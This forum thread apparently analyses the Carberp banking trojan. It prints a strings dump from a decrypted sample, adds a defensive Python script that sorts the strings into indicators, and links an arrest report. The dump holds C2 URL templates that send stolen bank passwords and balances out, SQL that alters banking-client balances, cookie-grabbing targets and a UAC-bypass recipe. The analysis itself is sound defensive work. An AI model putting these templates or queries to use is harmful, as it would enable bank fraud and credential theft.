Attachments
infected (270.63 KiB) Downloaded 119 times
A forum for reverse engineering, OS internals and malware analysis
Win32:Virut wrote: a) AhnLab detected as Trojan/Win32.Zbot but I don't think it is Zbot. Carberp with PowerLoader inject. Decrypted sample attached. However, most of the routines are called at runtime through pointers, not via the IAT.
.text user32.dll md5 av uid save_tf READY
%s:%s
HELLO
GET /stat?uptime=%d&downlink=%d&uplink=%d&id=%s&statpass=%s&comment=%s HTTP/1.0
:
І" it is16 it update PAYDOCRU set DOCUMENTDATE=?, STATUS=30001 where PAYERACCOUNT=? and DOCUMENTDATE=? and DOCUMENTNUMBER like '%%%s%%' select min(DOCUMENTDATE) from PAYDOCRU ot http://%s/set/bal.html?uid=%s&type=bss&sum=%s&acc=%s&pass=%s&cid=%s PWD= select Rest,Account from Account os31 os31 CBankClient cbank_copy.txt is16 update ACCOUNT set REST=%s where ACCOUNT=? select CLOSINGBALANCE from STATEMENTRU where STATEMENTDATE=(select Max(STATEMENTDATE) from STATEMENTRU) and CLOSINGBALANCE<>0 os16 is16 it update STATEMENTRU set OPENINGBALANCE=%d.%d, CLOSINGBALANCE = %d.%d where ACCOUNT=? and STATEMENTDATE=? select OPENINGBALANCE,CLOSINGBALANCE,STATEMENTDATE from STATEMENTRU where ACCOUNT=? and STATEMENTDATE>=? and OPENINGBALANCE<>0 order by STATEMENTDATE os16 os16 ot is16 it CBank system CryptLib.DLL 0 гX Ф8 З@ В@ ‡5 ]~ Ъ| c:\err_bl.exe cfg file_name mJ ^@ r? b@ д? Є? 9M т@ = MO lO иW ЈK ёK ЂK *K UK тQ 9 ‰Ю гX µ З@ В@ Y BJB application/octet-stream application/xhtml+xml application/xml application/javascript application/x-javascript ; text/ г] lO л] V` )^ № : | ze lO i f lO "f %debug% false %bot_id% 2v .exe application/x-www-form-urlencoded & АP МU ЁU HJGsdlk873d hstbmld.sgl bnk.list nobnk.list Content-Transfer-Encoding: binary Content-Type: -- https http Keep-Alive close ru */* ; filename=" Content-Disposition: form-data; name=" multipart/form-data; boundary= chunked
Content-MD5 Cache-Control Content-Range Accept-Ranges Location Connection Transfer-Encoding Range Pragma Content-Length Content-Type Accept-Encoding User-Agent Accept Referer Host HTTP/1.1 HTTP/1.0 TRACE PATCH OPTIONS CONNECT UNLINK LINK DELETE PUT HEAD POST GET X X шW фW мW дW ЬW ФW МW ДW јW °W ¤W њW ”W ЊW ЂW pW `W PW HW @W ,W W W W фV дV ШV \U АP РV `U ИV МU ЁU ЁV ЂV pV lV hV `V TV :// ? / LV DV @V 0V АT V %02X :// " bytes
0
HTTP/1. --------- bytes= - / Ё k№ HTTP/ ]є |є №® т@ z> z> #Ї ›є т@ т@ ¶№ ‚Е ‹Д gД Е 8Е \ PI BSS A: Floppy <P> </P> <L> </L> *bsi.dll* !Y !P bss Пароль ===> <Screen%d> screen%d.png ---> <TextLog%d> [%s] TextLog%d.txt UID: bss.log sign\ ЗЩ Новый текст кнопки: [%s]
Координаты %d, %d Кликаем по кнопке [%d][%s] Обрабатываем окно установки подписей. Подписей %d MЬ vЬ /Ь -Э Кликаем по кнопке закрытия Окно ввода пароля ‰Ю ЬУ пУ пС Окно ошибки ‰Ю ЁЮ пУ пС Обрабатываем форму [%s] Отображается окно: Получена команда СТОП *az_stop Получена команда СТАРТ *az_start CABINET .. . \*.* My e q r v n i 3 7 d s ieunitdrf.inf cert Pass.txt cert.pfx javassist.jar .log .db .pif .rar .tpl .rtf .doc .pl .cgi .7z .inc .phtm .php3 .phtml K8DFaGYUs83KF05T /pat/scrl.html X\ P\ H\ @\ <\ 4\ 0\ (\ \ \ \ \ \ ь[ http:// / *.* * sessionstore.* cookies.sqlite Mozilla\Firefox\Profiles\ C:\WINDOWS\system32\Macromed\ *.sol Macromedia\Flash Player\ cookie: \Cookies\index.dat %userprofile% 2 Seven 2008 Vista ‹
Microsoft Enhanced Cryptographic Provider v1.0 msctls_statusbar32 bin\paymentmodule\ cyberterm.exe cyberterm.mdb cbrplstf01.dat cptmp CyberPlat Keys Proc1 cyberplat.plug } { Software\Classes\CLSID\ PL ? os ”% FileGrabber keys *-BEGIN*-END* finam.ru finam no-store, no-cache, must-revalidate If-None-Match If-Modified-Since Last-Modified °W ¤W њW ЂW pW `W PW _ _ р^ дV РV М^ LV DV NSS layer ftp://%s:%s@%s:%d kernel32.dll advapi32.dll user32.dll ws2_32.dll ntdll.dll winsta.dll shell32.dll wininet.dll urlmon.dll nspr4.dll ssl3.dll winmm.dll cabinet.dll opera.dll Gdi32.dll gdiplus.dll crypt32.dll Iphlpapi.dll winspool.drv odbc32.dll comdlg32.dll psapi.dll shlwapi.dll version.dll Imagehlp.dll ole32.dll cryptdll.dll .dll https://s4.money.yandex.net* и` passw.plug .ngdf NGWF %X эO V {S E[ O] З@ В@ b:\ drive_b a:\ drive_a file txt save_sf screens HnT h n t . d a t pid_%d patchsetuped 1 procscreen SS_2.png windscreen SS_1.png keyfile host PSB hwnd pid keyhwnd file[Screen2] Screen2.png file[Screen1] Screen1.png file[Key] txt[log] WorkAcnt Accounts Status1103 Status1101 Times FreezeBal PlatSumm Drops FillDataToDBCache HProc7 GlobalAppStorage HProc6 RtlStore.bpl TCustomFormCloseQuery HProc5 TCustomFormShow HProc4 vcl70.bpl TaskAfterSynchRun HProc3 RtlData1.bpl OpenDatabaseConnection HProc2 VistaDB_D7.bpl , IFobs OldVersion DATA Client_prg\ ifobs.ini ifobs_scr scr http://%s/raf/?uid=%s&sys=ifobs&cid=%s&mode=setlog&log=1&text=%s keyssign\%s KeysSign Sign Path Sign Password Sign login keys\%s , Client folder: Path keys Password key Password system Login keys_dll\%s http://%s/raf/?uid=%s&sys=ifobs&cid=%s&mode=setlog&log=00&text=%s http://%s/raf/?uid=%s&sys=ifobs&cid=%s&mode=balance&sum=%s&acc=%s&text=bank|%s&w=1&ida=%s Счет: '%s', баланс: '%s', банк: '%s' DLL -> Login: '%s', Password system: '%s', Password keys: '%s', Path keys: %s, Client folder: %s rtlext.plug ifobs.plug RtlExt.bpl PasswordsCallBack BalanceCallBack InitFunc *TSignAsForm* *..* *TLoginForm* *iFOBS* lфШЅмЩШЅифщН 
‚Jдсы~> 0‚ \ ntdll.dll KiUserApcDispatcher atan WriteProcessMemory _chkstk kernel32.dll \ B a s e N a m e d O b j e c t s \ U r l Z o n e s S M _ S Y S T E M \ B a s e N a m e d O b j e c t s \ U r l Z o n e s S M _ A d m i n i s t r a t o r \ B a s e N a m e d O b j e c t s \ M S C T F . S h a r e d . S F M . A M F \ B a s e N a m e d O b j e c t s \ M S C T F . S h a r e d . S F M . M I H \ B a s e N a m e d O b j e c t s \ w i n d o w s _ s h e l l _ g l o b a l _ c o u n t e r s \ B a s e N a m e d O b j e c t s \ S h i m S h a r e d M e m o r y inject32_event inject32_section SetWindowLongA OutputDebugStringA CreateThread OpenFileMappingA MapViewOfFile CloseHandle Shell_TrayWnd v– i n d e x . h t m l PW дV М^ :// LV DV Accept-Encoding:
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ 1406 1609 Software\Microsoft\Internet Explorer\ Styles MaxScriptStatements Privacy CleanCookies Pat.txt wj.dat %s\%s\MSI Java7FamilyVersion Java6FamilyVersion JavaHome SOFTWARE\JavaSoft\Java Runtime Environment CurrentVersion SOFTWARE\JavaSoft\Java Update\Policy EnableJavaUpdate JAVAUPDATE AUTOUPDATECHECK IBank %sb.php?uid=%s&c=%s&v=%d&jv=%d_%d&botver=%s first_start setup_patch uid.txt CRC32.txt rt.jar wndrec.dll user.txt rt.ini rt2.jar rt_.jar lib launcher.jar "%s\AgentX.jar";launcher.jar;sinker-swing.jar;sinker.jar;firmware.jar;"%s\lib\javassist.jar" -Xmx256m -Xmx256M -javaagent:"%s\AgentX.jar" -Dsun.awt.warmup=true -javaagent:"%s\AgentX.jar" -Xbootclasspath/a: "%s\lib\javassist.jar";"%s\AgentX.jar"; javaw.exe java.exe PatchFail.txt url.txt AgentX.jar rt \lib\rt.jar rt_jar/ SunAwtCanvas ф4№е]} Tm №µ›Ђ¶™Ъэ Џъ
%®юw:Г<Ѕ :// ШД jclib25.ini bcspsb.inf client2015.tmp client2015.jar ibank2client.jar _client2015_orig.jar *://ibank2.ru/* */client_ver.js *://online.payment.ru/juricvalrur/JuridicalClient.html kp_videoprocess kp_svc_mt ]Й гИ ™К pК <Й pК Подпись и шифрование Подпись данных *егистрация пользователя* bss bsi.dll https://*/ibc Password: EDIT #* faktura avangard logon_enter c:\avn_ib avn_ib file.key *oper*BEGIN*END* *Клавиатура* cyberplatweb \BSS.V1\ \\.\PHYSICALDRIVE0 ImagePath \services\ACPI SYSTEM\ system32\drivers\AСPI.sys CurrentControlSet ControlSet002 ControlSet001 .xsi .ksi *.xsi *.ksi base id plist DSStor
Connection: Close
Host: User-Agent: Accept-Encoding: gzip, deflate
UA-CPU: x86
Accept-Language: ru
HTTP/1.1
Accept: */*
GET / Data CN ?|POST: cc data type brw cab type_name sdcabfile.cab bktrue 0123456789abcdefinstallam bitcoin_runned.txt btc.plug btcm.plug bitcoin_stop bitcoin VControl Информация об отправляемых документах sended save comment queue daterecv punktrecv accbankrecv bankrecv bikrecv namerecv accountrecv kpprecv innrecv nds sum namesend kppsend innsend status typepayment date express num Canvas Платёжное поручение form На данный момент это функцию выполнить невозможно, так как на сервере проводятся профилактические работы. Попробуйте через некоторое время.
Извините за доставленные неудобства. .xml .txt report.html <AccountStatements> F00: HEADER 1CClientBankExchange <td Сумма в валюте счета Количество операций Исходящий остаток на конец дня Входящий остаток на начало дня <tr> </tr> КонечныйОстаток ВсегоСписано СекцияДокумент КонецДокумента F44: OPERATION F312: F42: F29: F70: F71: F46: F52: F69: <DebitOverturnCount> <Statement> </Statement> <DebitOverturn <DebitOverturnCover> <DebitOverturnDealing> <DebitOverturnDealingCover> <OpenRemainder> <OutRemainder> <OutRemainderWithDealing> Шаблоны msctls_progress32 Подождите, идет настройка системы ... STATIC skeys miner ammyy aa.exe http://%s/raf/?uid=%s&sys=raifur&mode=setlog&log=%d%s%s &text= Внимание! report_html export_to_client_bank export_to_1C export_to_xml Счет N: (РОССИЙСКИЙ РУБЛЬ) РОССИЙСКИЙ РУБЛЬ http://%s/raf/?uid=%s&sys=raifur&cid=%s&mode=%s&%s sum=%s&acc=%s %s:%s; accs= getdrop getdrops M*
c
<Й Њц Key am.cfg %s
iphlpapi1.dll iphlpapi.dll aa1.exe ammy.plug -> rafa.dat WriteFile CreateFileA TrackPopupMenu CreateWindowExA SendMessageA FilialRCon.dll KERNEL32.DLL USER32.DLL raif StopMiner InitMiner cgminer.exe stop del њW ЂW `W http:// pgcache :// LV GDlet64E wndsksi.inf BJB botuid SG
.tmp http://%s/set/bit.html?uid=%s&sum=%d&type=cber&mode=stat&cid=%s http://%s/s.dll sber sbef.dat sbe.dat sbe 7.17 \StringFileInfo\%04x%04x\FileVersion \VarFileInfo\Translation SOFTWARE\SBRF\WCLNT Install_0 sb.bal Local Settings\Application Data\Sbr\sbgrbd.bal %USERPROFILE% Sber RegQueryValueExACallBack RegQueryValueExA LoadLibraryExWCallBack LoadLibraryExW GetOpenFileNameACallBack GetOpenFileNameA GetSaveFileNameACallBack GetSaveFileNameA EnumPrintersACallBack EnumPrintersA ExtTextOutWCallBack ExtTextOutW ExtTextOutACallBack ExtTextOutA TextOutWCallBack TextOutW TextOutACallBack TextOutA DrawTextExWCallBack DrawTextExW DrawTextExACallBack DrawTextExA DrawTextWCallBack DrawTextW DrawTextACallBack DrawTextA TranslateMessageCallBack TranslateMessage ShowWindowCallBack ShowWindow SetParams wclnt.exe ф|UУљs шу.L|
updateplug reboot killos bc ddos grabber deletecookies sendcookies \| iblock processblock getsbr UpdatePatch deletepatch T| L| PluginMain search Global\_SearchComplete32 gAltEPOffs docfind.plug RDP N O D 3 2 i g n o r e f i l e notreboot addtrust.plug update updateconfig download loaddll alert updatehosts loaddlldisk docfind rs rdp vnc ifobs lf exec addtrust download2 cbank installbtc u p d a t e c o n f i g l a s t s y n c s e l e c t a m o u n t s a m o u n t f l a g o r d e r c o d e s e l e c t a m o u n t s a m o u n t f l a g t r a n s f l a g d e s c select CLng(?) as MyDate it oi DRIVER=Microsoft Access Driver (*.mdb);DBQ= tiny_client\ select Name from Banks where Code=? os81 is30 select Param from Config where Code='MyBankId' os30 keys_tiny select Param from Config where Code='keypath' os255 Data Source= select Code From Amounts os32 update MyDocuments set OrgDate=?, DayDate=?, PayDate=? where DebitInit=? and Created>=? and Created<=? and Code=? ii ii ii is24 it it is31 update Documents set OrgDate=?, DayDate=? where DebitInit=? and Created>=? and Created<=? and Code=? ii ii is24 it it is31 update Turns set ConDebit=%d.%02d where Code='%s' and DayDate=%d update Amounts set Expected=%d.%02d,Confirmed=%d.%d where Code='%s' http://%s/raf/?uid=%s&sys=tiny&cid=%s&mode=balance&sum=%s&acc=%s&text=bank|%s&w=1 %d.%d select Code,Confirmed from Amounts where Confirmed>0 http://%s/raf/?uid=%s&sys=tiny&cid=%s&mode=setlog&log=00&text=%s Password= tiny Path client Path database Password select ConDebit from Turns where Code=? and DayDate=? select Expected from Amounts where Code=? os31 is31 select OrgDate,DayDate,PayDate from MyDocuments where DebitInit=? and Created>=? and Created<=? and Code=? oi oi oi is24 it it is31 select OrgDate, DayDate from Documents where DebitInit=? and Created>=? and Created<=? and Code=? 
oi oi is24 it it is31 select min(OrgDate) from Documents oi Tiny TKeyPasswordDlg TPasswordDlg TfAuthNew task_bypassuac.txt CRYPTSP.msu cryptbase.msu CRYPTSP.dll cryptbase.dll mcx2prov.exe sysprep.exe ehome system32\sysprep WinExec LoadLibraryA .rsrc cmd.exe /C %s cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\%s makecab.exe /V1 %s %s {Tab} {Down} {Up} {Right} {Left} {Del} {Back} URL.txt <Click> 0x%08X ScreenShots\ .png h† њ† Ё† „† ”† HЉ h† њ† Ё† p† „† ”† HЉ h† p† „† ”† HЉ Edit Address Band Root ReBarWindow32 WorkerW ComboBox ComboBoxEx32 https:// LogData.txt < .png> . % ' & (
%s %s %s %08X%08X RegId InstallDate DigitalProductId SOFTWARE\Microsoft\Windows NT\CurrentVersion , In progress... KERNEL32 ExitProcess %ALLUSERSPROFILE% Chrome_WidgetWin_0 OperaWindowClass MozillaWindowClass IEFrame Global\ NUL Have Wins: No
Secondary Wins Server: %s
Primary Wins Server: %s
Have Wins: Yes
DHCP Enabled: No
Lease Obtained: %ld
DHCP Server: %s
DHCP Enabled: Yes
***
MAC Address: %2X-%2X-%2X-%2X-%2X-%2X Gateway: %s
IP Mask: %s
IP Address: %s
Adapter Addr: %ld
Adapter Desc: %s
Adapter Name: %s
… \/:'" VNCDLL vncdll.plug DllStop TakeBotGuid Stop Start Init rdp.plug wbem VNC vnc.plug [CLASS: ] [TEXT: ] strstr _allmul _alldvrm ntdll.dll У DeleteFileA “GetTickCount KERNEL32.dll <P 8P 4P %az.host% THH 13+430+715+<4 <P 8P 4P = <P 8P 4P F <P 8P 4P @V \ p i n g . e x e \ i g x p d v 3 2 . d a t \ i g x p g d 3 2 . d a t “РU“UBSSSign loaddlls _BT_VER:1.3.0 PLUG_NAME <4+4<1+701+23
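What an analyst does with a dump like the one above is sort the strings by what they tell a defender: HTTP request and URL templates whose host is filled in at runtime (the C2 exchange), SQL statements aimed at a local banking-client database, registry keys, the modules the sample resolves by name, and the API/CallBack name pairs that point at hooked exports. The script below is an added example written for this thread, not code from the post or from the sample itself; its bucket names and noise heuristics are assumptions, and its input is a small constructed list transcribed from the strings above, with one line of the binary debris kept in to show the filter.

```python
"""Triage a raw strings dump (as `strings` prints it, one string per line)
into indicator buckets. Heuristics for a first pass, not a signature engine."""
import re
from collections import defaultdict

# Constructed sample: a few strings transcribed from the dump above, plus one
# line of the binary debris that a raw strings run interleaves with them.
SAMPLE_STRINGS = [
    r"GET /stat?uptime=%d&downlink=%d&uplink=%d&id=%s&statpass=%s&comment=%s HTTP/1.0",
    r"update PAYDOCRU set DOCUMENTDATE=?, STATUS=30001 where PAYERACCOUNT=? and DOCUMENTDATE=?",
    r"select Rest,Account from Account",
    r"http://%s/set/bal.html?uid=%s&type=bss&sum=%s&acc=%s&pass=%s&cid=%s",
    r"ftp://%s:%s@%s:%d",
    r"https://s4.money.yandex.net*",
    r"гX Ф8 З@ В@ ‡5 ]~ Ъ|",
    r"kernel32.dll advapi32.dll user32.dll ws2_32.dll nspr4.dll ssl3.dll",
    r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1406",
    r"SOFTWARE\JavaSoft\Java Runtime Environment",
    r"ExtTextOutWCallBack ExtTextOutW TextOutACallBack TextOutA GetOpenFileNameACallBack GetOpenFileNameA",
    r"DRIVER=Microsoft Access Driver (*.mdb);DBQ=",
    r"c:\err_bl.exe",
    r"Подпись и шифрование",
]

HTTP_REQ_RE = re.compile(r"^(?:GET|POST|HEAD|PUT)\s+\S+")
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+")
PLACEHOLDER_RE = re.compile(r"%(?:\d+)?[sdXx]")  # printf-style slot filled at runtime
SQL_RE = re.compile(r"^(?:select|update|insert|delete)\b", re.IGNORECASE)
REGISTRY_RE = re.compile(r"^(?:HKLM\\|HKCU\\)?(?:software|system)\\", re.IGNORECASE)
PATH_RE = re.compile(r"^[A-Za-z]:\\")
MODULE_RE = re.compile(r"^[\w.-]+\.(?:dll|sys|drv|bpl|exe|jar)$", re.IGNORECASE)
CYRILLIC_RE = re.compile(r"[\u0400-\u04FF]")


def is_noise(token: str) -> bool:
    """Reject the 1- and 2-byte fragments a strings pass picks out of packed or
    encrypted data. Genuine Cyrillic UI text is a run of Cyrillic letters; a
    Cyrillic letter glued to an ASCII symbol is decoder debris (heuristic)."""
    if CYRILLIC_RE.search(token):
        core = token.strip(".,:;!?()'\"[]-")
        return not (core and all(CYRILLIC_RE.match(c) for c in core))
    if len(token) < 3 and not token.isalnum():
        return True
    return any(not 32 <= ord(c) < 127 for c in token)


def triage(lines):
    """Bucket each line of a strings dump by what the sample would use it for."""
    buckets = defaultdict(list)
    for raw in lines:
        tokens = raw.split()
        line = raw.strip()
        if not tokens or all(is_noise(t) for t in tokens):
            buckets["noise"].append(line)
            continue
        if HTTP_REQ_RE.match(line):
            buckets["http_request_template"].append(line)
        elif URL_RE.search(line):
            # %s/%d slots mean host or path are filled in at runtime: a template
            # for the C2 exchange, not a fixed indicator you can block as-is
            key = "c2_url_template" if PLACEHOLDER_RE.search(line) else "url"
            buckets[key].append(line)
        elif SQL_RE.match(line):
            buckets["sql"].append(line)  # statements run against a local client database
        elif REGISTRY_RE.match(line):
            buckets["registry"].append(line)
        elif PATH_RE.match(line):
            buckets["file_path"].append(line)
        else:
            # several NUL-separated strings were flattened onto one line, so check tokens
            mods = [t for t in tokens if MODULE_RE.match(t)]
            hooks = [t for t in tokens if t.endswith("CallBack")]
            buckets["module"].extend(mods)
            buckets["hook_callback"].extend(hooks)
            if not mods and not hooks:
                buckets["other"].append(line)
    return dict(buckets)


def hooked_apis(lines):
    """Export names that appear both bare and with a 'CallBack' twin: the pairs
    a hook table carries (the original API next to the detour replacing it)."""
    tokens = {t for l in lines for t in l.split()}
    stems = (t[: -len("CallBack")] for t in tokens if t.endswith("CallBack"))
    return sorted(s for s in stems if s in tokens)


if __name__ == "__main__":
    for bucket, items in sorted(triage(SAMPLE_STRINGS).items()):
        print(f"{bucket}: {items}")
    print("hooked APIs:", hooked_apis(SAMPLE_STRINGS))
```

Run it on the output of `strings -n 6` over the decrypted module; the `c2_url_template` bucket tells you which request shapes to look for in proxy logs once the host slot is known, and the `hook_callback` pairs (text-output, file-dialog and printing APIs) are the user-space hooks an EDR integrity check on those exports would surface.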
r3shl4k1sh wrote: Arrest video of one of the Carberp group: This video was posted in March 2012, the latest Carberp release was December 2012, and the current date is November 2013...
http://lifenews.ru/#!news/86143